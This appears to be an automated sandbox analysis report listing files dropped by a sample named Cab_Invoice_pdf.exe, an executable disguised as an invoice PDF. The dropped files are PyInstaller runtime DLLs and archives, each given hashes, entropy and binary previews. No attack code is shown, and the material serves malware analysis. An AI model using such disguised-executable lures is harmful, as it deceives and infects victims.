                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....NE............!.........................0...............................@............@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v....................NE.........:...d...d........NE.........d................NE.....................RSDS..e.7P.g^j..[....api-ms-win-crt-convert-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.....................NE.............z...z...8... .......(...C...^...y...........................1...N...k...............................*...E...`...y...............................5...R...o.......................,...M...n...........
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-environment-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18736
                          Entropy (8bit):7.078409479204304
                          Encrypted:false
                          SSDEEP:192:bWIghWGd4edXe123Ouo+Uggs/nGfe4pBjSXXmv5Wh0txKdmVWQ4SWEApkqnajPBZ:bWPhWqXYi00GftpBjBemPl1z6h2
                          MD5:AC290DAD7CB4CA2D93516580452EDA1C
                          SHA1:FA949453557D0049D723F9615E4F390010520EDA
                          SHA-256:C0D75D1887C32A1B1006B3CFFC29DF84A0D73C435CDCB404B6964BE176A61382
                          SHA-512:B5E2B9F5A9DD8A482169C7FC05F018AD8FE6AE27CB6540E67679272698BFCA24B2CA5A377FA61897F328B3DEAC10237CAFBD73BC965BF9055765923ABA9478F8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....jU............!......................... ...............................0......G.....@............................."............ ..................0=..............T............................................................................text...2........................... ..`.rsrc........ ......................@..@v....................jU.........>...d...d........jU.........d................jU.....................RSDSu..1.N....R.s,"\....api-ms-win-crt-environment-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg......."....edata... ..`....rsrc$01....` .......rsrc$02.................jU.....................8...............C...d...........................3...O...l....................... .......5...Z...w.......................)...F...a...........................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-filesystem-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20280
                          Entropy (8bit):7.085387497246545
                          Encrypted:false
                          SSDEEP:384:sq6nWm5C1WPhWFK0i00GftpBjB1UemKklUG+zIOd/:x6nWm5CiooiKeZnbd/
                          MD5:AEC2268601470050E62CB8066DD41A59
                          SHA1:363ED259905442C4E3B89901BFD8A43B96BF25E4
                          SHA-256:7633774EFFE7C0ADD6752FFE90104D633FC8262C87871D096C2FC07C20018ED2
                          SHA-512:0C14D160BFA3AC52C35FF2F2813B85F8212C5F3AFBCFE71A60CCC2B9E61E51736F0BF37CA1F9975B28968790EA62ED5924FAE4654182F67114BD20D8466C4B8F
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......h...........!......................... ...............................0......I.....@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v......................h........=...d...d..........h........d..................h....................RSDS.....a.'..G...A.....api-ms-win-crt-filesystem-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02...................h............A...A...8...<...@...........$...=...V...q...................)...M...q......................./...O...o...........................7...X...v...........................6...U...r.......................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-heap-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.060393359865728
                          Encrypted:false
                          SSDEEP:192:+Y3vY17aFBR4WIghWG4U9CedXe123Ouo+Uggs/nGfe4pBjSbGGAPWh0txKdmVWQC:+Y3e9WPhWFsXYi00GftpBjfemnlP55s
                          MD5:93D3DA06BF894F4FA21007BEE06B5E7D
                          SHA1:1E47230A7EBCFAF643087A1929A385E0D554AD15
                          SHA-256:F5CF623BA14B017AF4AEC6C15EEE446C647AB6D2A5DEE9D6975ADC69994A113D
                          SHA-512:72BD6D46A464DE74A8DAC4C346C52D068116910587B1C7B97978DF888925216958CE77BE1AE049C3DCCF5BF3FFFB21BC41A0AC329622BC9BBC190DF63ABB25C6
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...J.o ...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................J.o ........7...d...d.......J.o ........d...............J.o ....................RSDSq.........pkQX[....api-ms-win-crt-heap-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02........J.o ....6...............(...........c...................S.......................1...V...y.......................<...c...........................U...z...............:...u...................&...E...p.......................,...U...
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-locale-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.13172731865352
                          Encrypted:false
                          SSDEEP:192:fiWIghWGZirX+4z123Ouo+Uggs/nGfe4pBjS/RFcpOWh0txKdmVWQ4GWs8ylDikh:aWPhWjO4Ri00GftpBjZOemSXlvNQ0
                          MD5:A2F2258C32E3BA9ABF9E9E38EF7DA8C9
                          SHA1:116846CA871114B7C54148AB2D968F364DA6142F
                          SHA-256:565A2EEC5449EEEED68B430F2E9B92507F979174F9C9A71D0C36D58B96051C33
                          SHA-512:E98CBC8D958E604EFFA614A3964B3D66B6FC646BDCA9AA679EA5E4EB92EC0497B91485A40742F3471F4FF10DE83122331699EDC56A50F06AE86F21FAD70953FE
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...|..O...........!......................... ...............................0......E*....@.............................e............ ..................8=..............T............................................................................text...u........................... ..`.rsrc........ ......................@..@v...................|..O........9...d...d.......|..O........d...............|..O....................RSDS.X...7.......$k....api-ms-win-crt-locale-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg.......e....edata... ..`....rsrc$01....` .......rsrc$02....................|..O....................8...........5...h...............E...................$...N...t...................$...D...b...!...R............... ...s...................:...k.......................9...X...................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-math-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):28984
                          Entropy (8bit):6.6686462438397
                          Encrypted:false
                          SSDEEP:384:7OTEmbM4Oe5grykfIgTmLyWPhW30i00GftpBjAKemXlDbNl:dEMq5grxfInbRoiNeSp
                          MD5:8B0BA750E7B15300482CE6C961A932F0
                          SHA1:71A2F5D76D23E48CEF8F258EAAD63E586CFC0E19
                          SHA-256:BECE7BAB83A5D0EC5C35F0841CBBF413E01AC878550FBDB34816ED55185DCFED
                          SHA-512:FB646CDCDB462A347ED843312418F037F3212B2481F3897A16C22446824149EE96EB4A4B47A903CA27B1F4D7A352605D4930DF73092C380E3D4D77CE4E972C5A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................@...............................P............@..............................+...........@...............4..8=..............T............................................................................text....,.......................... ..`.rsrc........@.......0..............@..@v...............................7...d...d...................d.......................................RSDSB...=........,....api-ms-win-crt-math-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg........+...edata...@..`....rsrc$01....`@.......rsrc$02................l.......:...:...(...................................(...@...X...q...............................4...M...g........................ ..= ..i ... ... ... ...!..E!..o!...!...!...!..."..F"..s"..."..."..."...#..E#..o#...#...#..
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-process-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):19256
                          Entropy (8bit):7.076072254895036
                          Encrypted:false
                          SSDEEP:192:aRQqjd7dWIghWG4U9kuDz7M123Ouo+Uggs/nGfe4pBjSbAURWh0txKdmVWQ4CW+6:aKcWPhWFkDz6i00GftpBjYemZlUG+zIU
                          MD5:8D02DD4C29BD490E672D271700511371
                          SHA1:F3035A756E2E963764912C6B432E74615AE07011
                          SHA-256:C03124BA691B187917BA79078C66E12CBF5387A3741203070BA23980AA471E8B
                          SHA-512:D44EF51D3AAF42681659FFFFF4DD1A1957EAF4B8AB7BB798704102555DA127B9D7228580DCED4E0FC98C5F4026B1BAB242808E72A76E09726B0AF839E384C3B0
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L...l.h............!......................... ...............................0.......U....@.............................x............ ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v...................l.h.........:...d...d.......l.h.........d...............l.h.....................RSDSZ\.qM..I....3.....api-ms-win-crt-process-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......x....edata... ..`....rsrc$01....` .......rsrc$02....................l.h.............$...$...8.......X...................&...@...Y...q...........................*...E..._...z.......................!...<...V...q...........................9...V...t.......................7...R...i...
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-runtime-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):22840
                          Entropy (8bit):6.942029615075195
                          Encrypted:false
                          SSDEEP:384:7b7hrKwWPhWFlsnhi00GftpBj+6em90lmTMiLzrF7:7bNrKxZnhoig6eQN7
                          MD5:41A348F9BEDC8681FB30FA78E45EDB24
                          SHA1:66E76C0574A549F293323DD6F863A8A5B54F3F9B
                          SHA-256:C9BBC07A033BAB6A828ECC30648B501121586F6F53346B1CD0649D7B648EA60B
                          SHA-512:8C2CB53CCF9719DE87EE65ED2E1947E266EC7E8343246DEF6429C6DF0DC514079F5171ACD1AA637276256C607F1063144494B992D4635B01E09DDEA6F5EEF204
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L.....L............!.........................0...............................@.......i....@..........................................0..................8=..............T............................................................................text............................... ..`.rsrc........0......................@..@v.....................L.........:...d...d.........L.........d.................L.....................RSDS6..>[d.=. ....C....api-ms-win-crt-runtime-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02......................L.....f.......k...k...8...............................4...S...s.......................E...g.......................)...N...n...................&...E...f...................'...D...j.......................>.......
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-stdio-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):24368
                          Entropy (8bit):6.873960147000383
                          Encrypted:false
                          SSDEEP:384:GZpFVhjWPhWxEi00GftpBjmjjem3Cl1z6h1r:eCfoi0espbr
                          MD5:FEFB98394CB9EF4368DA798DEAB00E21
                          SHA1:316D86926B558C9F3F6133739C1A8477B9E60740
                          SHA-256:B1E702B840AEBE2E9244CD41512D158A43E6E9516CD2015A84EB962FA3FF0DF7
                          SHA-512:57476FE9B546E4CAFB1EF4FD1CBD757385BA2D445D1785987AFB46298ACBE4B05266A0C4325868BC4245C2F41E7E2553585BFB5C70910E687F57DAC6A8E911E8
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L..................!.........................0...............................@.......)....@.............................a............0..............."..0=..............T............................................................................text...a........................... ..`.rsrc........0......................@..@v...............................8...d...d...................d.......................................RSDS...iS#.hg.....j....api-ms-win-crt-stdio-l1-1-0.pdb.........d....rdata..d........rdata$zzzdbg.......a....edata...0..`....rsrc$01....`0.......rsrc$02................^...............(....... ...................<...y...........)...h........... ...]...............H...............)...D...^...v...............................T...u.......................9...Z...{...................0...Q...
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-string-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):23488
                          Entropy (8bit):6.840671293766487
                          Encrypted:false
                          SSDEEP:384:5iFMx0C5yguNvZ5VQgx3SbwA7yMVIkFGlnWPhWGTi00GftpBjslem89lgC:56S5yguNvZ5VQgx3SbwA71IkFv5oialj
                          MD5:404604CD100A1E60DFDAF6ECF5BA14C0
                          SHA1:58469835AB4B916927B3CABF54AEE4F380FF6748
                          SHA-256:73CC56F20268BFB329CCD891822E2E70DD70FE21FC7101DEB3FA30C34A08450C
                          SHA-512:DA024CCB50D4A2A5355B7712BA896DF850CEE57AA4ADA33AAD0BAE6960BCD1E5E3CEE9488371AB6E19A2073508FBB3F0B257382713A31BC0947A4BF1F7A20BE4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L......S...........!.........................0...............................@......B.....@..........................................0..............."...9..............T............................................................................text............................... ..`.rsrc........0......................@..@v......................S........9...d...d..........S........d..................S....................RSDSI.......$[~f..5....api-ms-win-crt-string-l1-1-0.pdb............d....rdata..d........rdata$zzzdbg............edata...0..`....rsrc$01....`0.......rsrc$02.......................S....,...............8...........W...s.......................#...B...a...........................<...[...z.......................;...[...{................... ...A...b...........................<...X...r.......
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-time-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):20792
                          Entropy (8bit):7.018061005886957
                          Encrypted:false
                          SSDEEP:384:8ZSWWVgWPhWFe3di00GftpBjnlfemHlUG+zITA+0:XRNoibernAA+0
                          MD5:849F2C3EBF1FCBA33D16153692D5810F
                          SHA1:1F8EDA52D31512EBFDD546BE60990B95C8E28BFB
                          SHA-256:69885FD581641B4A680846F93C2DD21E5DD8E3BA37409783BC5B3160A919CB5D
                          SHA-512:44DC4200A653363C9A1CB2BDD3DA5F371F7D1FB644D1CE2FF5FE57D939B35130AC8AE27A3F07B82B3428233F07F974628027B0E6B6F70F7B2A8D259BE95222F5
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....OI...........!......................... ...............................0............@.......................................... ..................8=..............T............................................................................text............................... ..`.rsrc........ ......................@..@v....................OI........7...d...d........OI........d................OI....................RSDS...s..,E.w.9I..D....api-ms-win-crt-time-l1-1-0.pdb..........d....rdata..d........rdata$zzzdbg............edata... ..`....rsrc$01....` .......rsrc$02.........OI............H...H...(...H...h... ...=...\...z.......................8...V...s.......................&...D...a...~.......................?...b.......................!...F...k.......................0...N...k...................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\api-ms-win-crt-utility-l1-1-0.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):18744
                          Entropy (8bit):7.127951145819804
                          Encrypted:false
                          SSDEEP:192:QqfHQdu3WIghWG4U9lYdsNtL/123Ouo+Uggs/nGfe4pBjSb8Z9Wh0txKdmVWQ4Cg:/fBWPhWF+esnhi00GftpBjLBemHlP55q
                          MD5:B52A0CA52C9C207874639B62B6082242
                          SHA1:6FB845D6A82102FF74BD35F42A2844D8C450413B
                          SHA-256:A1D1D6B0CB0A8421D7C0D1297C4C389C95514493CD0A386B49DC517AC1B9A2B0
                          SHA-512:18834D89376D703BD461EDF7738EB723AD8D54CB92ACC9B6F10CBB55D63DB22C2A0F2F3067FE2CC6FEB775DB397030606608FF791A46BF048016A1333028D0A4
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........m....e...e...e..ne...e..na...e..n....e..ng...e.Rich..e.PE..L....!5............!......................... ...............................0.......4....@.............................^............ ..................8=..............T............................................................................text...n........................... ..`.rsrc........ ......................@..@v....................!5.........:...d...d........!5.........d................!5.....................RSDS............k.....api-ms-win-crt-utility-l1-1-0.pdb...........d....rdata..d........rdata$zzzdbg.......^....edata... ..`....rsrc$01....` .......rsrc$02.....................!5.....d...............8.......(...................#...<...U...l...............................+...@...[...r...................................4...I..._.......................3...N...e...|.......................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\base_library.zip
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:Zip archive data, at least v2.0 to extract
                          Category:dropped
                          Size (bytes):788326
                          Entropy (8bit):5.450096772437984
                          Encrypted:false
                          SSDEEP:12288:hE7Qf7ul3vNuOn9/eV8h9+fsEaD1VykmrMbbcor:i7Qf7AvT/eV8h9+fsEaxdbbdr
                          MD5:8EB57166E2699F02C4BC8BE1383F283D
                          SHA1:1B89862749423F4A683B4DA2ADE4610CCD715E92
                          SHA-256:9F7818513C4A3D482539D83B0F5669D1C92D0E4DE707F028152EF2DC1F071F0E
                          SHA-512:259E001ED7417CFCAC6F8428422048CEB13ED2F814C27345EC55BF619E11F02D6464EFE30445AA6D3FD827582E8E1932DF4F59C9AAC6B0C6E77CB6102CC39607
                          Malicious:false
                          Reputation:unknown
                          Preview: PK..........!...^D............_bootlocale.pycU............e.....................@...sz...d.Z.d.d.l.Z.d.d.l.Z.e.j...d...r,d.d.d...Z.nJz.e.j...W.n4..e.k.rj......e.e.d...r\d.d.d...Z.n.d.d.d...Z.Y.n.X.d.d.d...Z.d.S.).z.A minimal subset of the locale module used at interpreter startup.(imported by the _io module), in order to reduce startup time...Don't import directly from third-party code; use the `locale` module instead!......N..winTc....................C...s....t.j.j.r.d.S.t.....d...S.).N..UTF-8.....)...sys..flags..utf8_mode.._locale.._getdefaultlocale....do_setlocale..r.....Lc:\users\ieuser\appdata\local\programs\python\python38-32\lib\_bootlocale.py..getpreferredencoding....s..........r......getandroidapilevelc....................C...s....d.S.).Nr....r....r....r....r....r....r........s......c....................C...s....t.j.j.r.d.S.d.d.l.}.|...|...S.).Nr....r....).r....r....r......localer....).r....r....r....r....r....r........s............c....................C...s6...|.r.t...t.j.j
                          C:\Users\user\AppData\Local\Temp\_MEI24122\file.exe.manifest
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                          Category:dropped
                          Size (bytes):1490
                          Entropy (8bit):5.276963138578381
                          Encrypted:false
                          SSDEEP:24:2dt4+iNKg9mMPgi0iiNK+bkgxIme7cb3jgMkb4+GE:cSFKgYSEK+bkgxImeMcn3GE
                          MD5:0AA1B4EF7F524C59405E0F7B3F004920
                          SHA1:24B2A847CC79132566696803636E53CC9D87D79D
                          SHA-256:6F78C922ADC11D653C278685025181E37EE7976C5A57DF34EC297166A82F016D
                          SHA-512:26924E70A196FA455C68BE1DCFEEEC1F507A04BE79DE57A55523939C49F106A46194A379109B9348FF009CF5BBB7B676206FB14BBDFC82DFFD67EC2E77309214
                          Malicious:false
                          Reputation:unknown
                          Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity type="win32" name="file" processorArchitecture="x86" version="1.0.0.0"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">.. <security>.. <requestedPrivileges>.. <requestedExecutionLevel level="asInvoker" uiAccess="false"/>.. </requestedPrivileges>.. </security>.. </trustInfo>.. <dependency>.. <dependentAssembly>.. <assemblyIdentity type="win32" name="Microsoft.Windows.Common-Controls" language="*" processorArchitecture="*" version="6.0.0.0" publicKeyToken="6595b64144ccf1df"/>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1"/>.. </dependentAssembly>.. </dependency>.. <compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">.. <application>.. <supportedOS Id="{e2011457-1546-43c5-a5fe-008deee3d3f0}"/>.. <supportedOS Id="{35138b9a-5d96-4fbd-8e2d-a2440
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libcrypto-1_1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):2234560
                          Entropy (8bit):6.107082014192982
                          Encrypted:false
                          SSDEEP:49152:mIvPtO+ejtvRMO8xxZv1CPwDv3uFfJhFcl:xvPtwjnMO8HZv1CPwDv3uFfJh6
                          MD5:76DA35FDE4E3E110331612AB351A811C
                          SHA1:1836517441C70848DB3F5D4EF4EA0CB2E330732A
                          SHA-256:ECABC901FA89CD771405C004849384A5148644C273A88048AE16C86BD14EF4DD
                          SHA-512:A43DAE59C7D71E38F6365413946EE740C643299403DFE531D0CDBD561623807784830124B786422799AE45852F5AA541B5A94FA8E0947850547E2446BA99BC30
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ..dA..dA..dA..m9..pA..6)..fA..6)..nA..6)..nA..6)..nA..?)..oA..dA...A...(...C...(..eA...(m.eA...(..eA..RichdA..................PE..L......_...........!.................H........................................"......."...@.........................0~...h...U!.T.....!.|.............!.......!.X....b..8............................b..@............P!..............................text.............................. ..`.rdata..F&.......(..................@..@.data...4Y.... ....... .............@....idata..h....P!....... .............@..@.00cfg.......p!....... .............@..@.rsrc...|.....!.......!.............@..@.reloc........!.......!.............@..B........................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libffi-7.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):29208
                          Entropy (8bit):6.643623418348
                          Encrypted:false
                          SSDEEP:384:l69PtXvz8cLBN3gHhY4AFlfIvDzqig2c2LuRRClfW23JLURlV5uH+6nYPLxDG4yG:l65tXvz2CTIvy2c26A35qYvWDG4yG
                          MD5:BC20614744EBF4C2B8ACD28D1FE54174
                          SHA1:665C0ACC404E13A69800FAE94EFD69A41BDDA901
                          SHA-256:0C7EC6DE19C246A23756B8550E6178AC2394B1093E96D0F43789124149486F57
                          SHA-512:0C473E7070C72D85AE098D208B8D128B50574ABEBBA874DDA2A7408AEA2AABC6C4B9018801416670AF91548C471B7DD5A709A7B17E3358B053C37433665D3F6B
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......)..qm.."m.."m.."d.p"o.."?..#o.."...#n.."m.."I.."?..#f.."?..#g.."?..#n.."...#k.."...#l.."...#l.."...#l.."Richm.."................PE..L.....]...........!.....@...........E.......P......................................H.....@.........................pU.......X..P....................X.......p..<....R..............................0R..@............P...............................text...j>.......@.................. ..`.rdata..p....P.......D..............@..@.data........`.......R..............@....reloc..<....p.......T..............@..B................................................................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\libssl-1_1.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):538304
                          Entropy (8bit):5.760022892820208
                          Encrypted:false
                          SSDEEP:12288:AqejFQiEYXBYYu3yzOBC4ISRpQuU2lvz/c:xaFJ5zF41TQuU2lvz/c
                          MD5:0E15ACB04CFABDE2A6493FAA49E74280
                          SHA1:E8EAC74A6DA0F1E78C66F84C14CF92DF18CC7E8A
                          SHA-256:A59EC84F8AE6F0174D5C1CE3ABC22B0FDCED6B50F7C8B689367AC859AC9E08E7
                          SHA-512:12D24D5FD42829FD0F89A1E42F46CD498D71E441EC803161319E721A3280406589B540EC949BBB6C0AF661CE806BA50A1097B7793C9A1CCC83061DEC4FC753AD
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............K...K...K..wK...K..J...K..J...K..J...K..J...K..J...K)..J...K...Km..K)..J...K)..J...K)..K...K)..J...KRich...K................PE..L......_...........!.........................................................`......h.....@..............................N..............s.................... ...5..P...8...............................@............................................text...7........................... ..`.rdata...g.......h..................@..@.data....;...p...6...Z..............@....idata..=A.......B..................@..@.00cfg..............................@..@.rsrc...s...........................@..@.reloc..4=... ...>..................@..B................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\pyexpat.pyd
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):168624
                          Entropy (8bit):6.629244601257658
                          Encrypted:false
                          SSDEEP:3072:ZhgFHiME7l8Z5bYwLoE8KZKGjUdGjN81IuBhh7Eu0:QFHc7l8ZORKZKGjtjN8E
                          MD5:6E2329BA53FF8B6E2E4069A859EE3FCE
                          SHA1:1C067F16A3069A44EDF7A073FA35B70B86F99405
                          SHA-256:27363A2DCDD990DEF43307B1644DC03304F9478830C8989C49F9DA2491889E6E
                          SHA-512:C0FCC4F0AE5C019ADAE3593F81BA26CA8C5CF6A7C15B78FD42B052DBDA6CBDEFDC6F8FA52C3FD614F1B17F48725D58CA23972C8B7C183EAFC0D542251A9EF23D
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........C...-L..-L..-L..L..-Ls.,M..-Ls.(M..-Ls.)M..-Ls..M..-LT.,M..-L.,M..-L..,L..-LT.%M..-LT.-M..-LT..L..-LT./M..-LRich..-L........PE..L...../`...........!......................................................................@.........................`B..P....B.......p...............v...............=..T............................>..@............................................text............................... ..`.rdata...N.......P..................@..@.data...X....P.......>..............@....rsrc........p.......J..............@..@.reloc........... ...V..............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\python38.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):4052656
                          Entropy (8bit):6.720992659261596
                          Encrypted:false
                          SSDEEP:49152:NgQmEhbJSgm06kaUr9Alta2tPfx1CI8jXHB7MZnCPYJAT37PtLKK4WoooOA:iEWg5uta2/8LHxMZBJ4lKKoooOA
                          MD5:7B97AB4F12ED448B26669B83F9061BEF
                          SHA1:0E2516F3DC50EFB7FAA0B276830B4F95D8084772
                          SHA-256:E7312737C82CC967FB669AE4C2736CB005F4192E1654C717DBDC5986E562957B
                          SHA-512:4F123981982EA4AFFE230CBDCDBEC9DE419D4F3D92C026B2DF3DA7D2BE9BEFAAB707167265CFC97FF183F13A60BE6C53FB541E00F518BEACE819B8B9B4927D8A
                          Malicious:false
                          Reputation:unknown
                          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........j...................%(................................"...y...".....".....".....Rich............PE..L...m./`...........!......#..........#.......#...............................?.......>...@..........................b8......%9.|.....=...............=...... =..e...]8.T...........................P^8.@.............#..............................text.....#.......#................. ..`.rdata.......#.......#.............@..@.data.......P9......89.............@....rsrc.........=......H;.............@..@.reloc...e... =..f...T;.............@..B........................................................................................................................................................................................................................................................................................................
                          C:\Users\user\AppData\Local\Temp\_MEI24122\pywintypes38.dll
                          Process:C:\Users\user\Desktop\Cab_Invoice_pdf.exe
                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                          Category:dropped
                          Size (bytes):115712
                          Entropy (8bit):6.533866514211769
                          Encrypted:false
                          SSDEEP:3072:QCf+6EE1b22/q4+ldC56PsZyLY7b00nPO4KMGSncyl8ZpFI:h+xE1iz4+ldC5msYLY7b00PO4KMGScyW
                          MD5:3206CF4CD05B9E993A822C0DAC05B1D0
                          SHA1:F49E809FB19BC1E24F1A7904663375554BD4D5CD
                          SHA-256:9A3B70353BB9346BF1ECD2784164FEAF6DBC9CB969298091F549EF8269AEF930
                          SHA-512:A6A4AA66E264E2438DF573D31DA0827650F48F4877ECABF391D284C99019E041F3333A708E2657FFC565B0CB9933D9C7A77B3726B8F4EC0DDA5DA3C5E8AB68C0
                          Malicious:false
                          Reputation:unknown
